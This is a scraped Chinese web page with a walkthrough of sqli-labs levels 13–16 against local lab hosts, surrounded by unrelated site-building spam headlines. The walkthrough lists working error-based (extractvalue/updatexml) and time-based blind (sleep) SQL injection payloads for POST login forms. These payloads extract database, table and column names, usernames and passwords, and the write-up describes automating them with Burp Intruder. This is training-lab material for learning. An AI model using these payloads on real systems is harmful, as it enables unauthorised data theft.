当前位置: 首页 > news >正文

html5做个网站多少钱视频网站策划

html5做个网站多少钱,视频网站策划,ui设计那个培训班好,丹阳网站建设制作http://127.0.0.1/sqli-labs/less-13/ 基于POST单引号双注入变形 1#xff0c;依然是一个登录框#xff0c;POST型SQL注入 2#xff0c;挂上burpsuite#xff0c;然后抓取请求#xff0c;构造请求判断漏洞类型和闭合条件 admin 发生了报错#xff0c;根据提示闭合方式是(… http://127.0.0.1/sqli-labs/less-13/ 基于POST单引号双注入变形 1依然是一个登录框POST型SQL注入 2挂上burpsuite然后抓取请求构造请求判断漏洞类型和闭合条件 admin 发生了报错根据提示闭合方式是() admin) # 不发生报错说明闭合方式正是() 3然后就是判断数据表的列数 admin) order by 2 # admin) order by 3 # 说数据表不存在第三列那么数据表就只有两列 4然后使用union select操作符判断回显点发现没有反应。使用报错函数进行报错注入爆出数据库名 1)and updatexml(1,concat(0x7e,(select database())),3)# 1)and extractvalue(1,concat(0x7e,(select database())),3)# 再爆出数据库下数据表名 1)and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)))# 1)and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)))# 1)and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)))# 1)and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)))# 整理得到数据表有emails,referers,uagents,users。然后再爆出users表的字段 1)and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 0,1)))# 1)and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 1,1)))# 1)and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 2,1)))# 然后再爆出用户名和密码 1)and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))# 1)and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))# 这个时候就可以直接拿intruder模块进行爆破了 偏移量作为变量字典选择0-9 爆破出password也是同样的操作 http://192.168.99.74/sqli-labs/less-14/ 第十四关 基于POST双引号双注入变形 payload: admin admin order by 2# admin order by 3# 1and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)))# 1and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)))# 1and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)))# 1and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)))# 1and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 0,1)))# 1and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 1,1)))# 1and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase()  and table_nameusers limit 2,1)))# 1and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))# 1and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))# http://192.168.99.74/sqli-labs/less-15/ 第十五关 基于POST数值型注入 本关没有错误提示那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql 语句 $sqlSELECT username, password FROM users WHERE username$uname and password$passwd LIMIT 0,1; sql查询语句这里对 id 进行id的处理。 本关我们利用延时注入进行。正确的时候可以直接登录不正确的时候延时 5 秒。 猜测数据库名长度为8在burpsuite Intruder模块中8设置为变量 unameadminand If(length(database())8,1,sleep(5))#passwd11submitSubmit 字典选取1-9 猜测数据库名第一位为s(ASCII表中a-z对应97-122) unameadminand If(ascii(substr(database(),1,1))115,1,sleep(5))#passwd11submitSubmit 由此根据排列payload1的顺序就能得到数据库名 猜测数据表名第一位为e(ASCII表中a-z对应97-122) unameadmin AND If(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schemasecurity LIMIT 0,1),1,1))101,1,sleep(1))#passwd11submitSubmit 所以第一张数据表就是email以此类推递增改变limit 0,1当中的0就能爆破出所有的数据表名emails,referers,uagents,users 猜测数据库security下数据表users字段的第一位是否为a(ASCII表中a-z对应97-122) unameadmin AND If(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schemasecurity AND table_nameusers LIMIT 0,1),1,1))97,1,sleep(1))#passwd11submitSubmit 所以第一个字段就是id递增改变limit 0,1当中的0就能爆破出所有的字段id,username,password 猜测 security 数据库下 users 表的 username 字段第二个字段的第一条数据的第一个字母是否为 a unameadmin AND If(ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))97,1,sleep(1))#passwd11submitSubmit 得到第一个用户名Dumb同理可得由此爆破出密码 unameadmin AND If(ascii(substr((SELECT password FROM security.users LIMIT 0,1),1,1))97,1,sleep(1))#passwd11submitSubmit http://192.168.99.74/sqli-labs/Less-16/ 同样的使用延时注入的方法进行解决。提交的测试payload(条件为真会5s延迟) admin and if (11,sleep(5),0) admin and if (11,sleep(5),0) admin) and if (11,sleep(5),0) admin and if (11,sleep(5),0) admin)and if(11,sleep(5),0) 所以语句的闭合方式就是(admin)区别于less-15 判断数据库名长度为8 unameadmin)and If(length(database())8,1,sleep(5))#passwd11submitSubmit 猜测数据库名第一位为s(ASCII表中a-z对应97-122) unameadmin)and If(ascii(substr(database(),1,1))115,1,sleep(5))#passwd11submitSubmit 猜测数据表名第一位为e(ASCII表中a-z对应97-122) unameadmin) AND If(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schemasecurity LIMIT 0,1),1,1))101,1,sleep(1))#passwd11submitSubmit 猜测数据库security下数据表users字段的第一位是否为a(ASCII表中a-z对应97-122) unameadmin) AND If(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schemasecurity AND table_nameusers LIMIT 0,1),1,1))97,1,sleep(1))#passwd11submitSubmit 猜测 security 数据库下 users 表的 username 字段第二个字段的第一条数据的第一个字母是否为 a unameadmin AND If(ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))97,1,sleep(1))#passwd11submitSubmit
http://www.hkea.cn/news/14532829/

相关文章:

  • 内网 群晖 wordpressseo排名快速优化
  • 做视频找素材的网站有哪些wordpress 文章所属分类
  • 嘉兴网站制作网页做英文网站 是每个单词首字母大写 还是每段落首字母大写
  • 义乌市建设局网站二维码生成器在线制作二维码
  • 设计好 英文网站深圳网站商城建设
  • 保洁公司网站怎么做网站做301跳转需解析
  • thinkphp 网站根目录地址网站建设公司项目介绍
  • 西安网站代维护移动互联网开发的前景
  • 潮州市建设局官方网站手机全部网站
  • 怎样制作网站教程哪家好北京建设网站官网
  • 公司注销的网站备案网站搭建需要服务器吗
  • 怎么做网站外贸网站建设需要的技术设备
  • 做英文网站要多少钱php手机网站如何制作
  • 大丰城乡建设局网站asp.net 做网站源代码
  • 桂林网站建设凡森网络百度怎样做网站排名往前
  • 台州市建设招标投标网站广西南宁人才招聘网站
  • 商城网站建设合同所有手机浏览器大全
  • 信誉好的做网站公司云朵课堂网站开发怎么收费
  • 彩票网站和app建设wordpress 支付宝 主题
  • 站群cms程序
  • 自助小站北京南站属于哪个街道
  • 做网站如何选择关键词手机论坛网站源码
  • 可以做免费推广的网站营销策划书模板
  • 微信公众号网站导航怎么做网站前缀带wap的怎么做
  • 建设类网站有哪些怎么设计网页模板
  • 数字火币交易网站开发深圳产品设计招聘信息
  • 淄博网站建设常见问题wordpress拼音
  • 漫画 网站 源码百度seo优化培训
  • 石材石料网站搭建教程网站用表格做的吗
  • 平顶山营销型网站建设宁波网站优化公司价格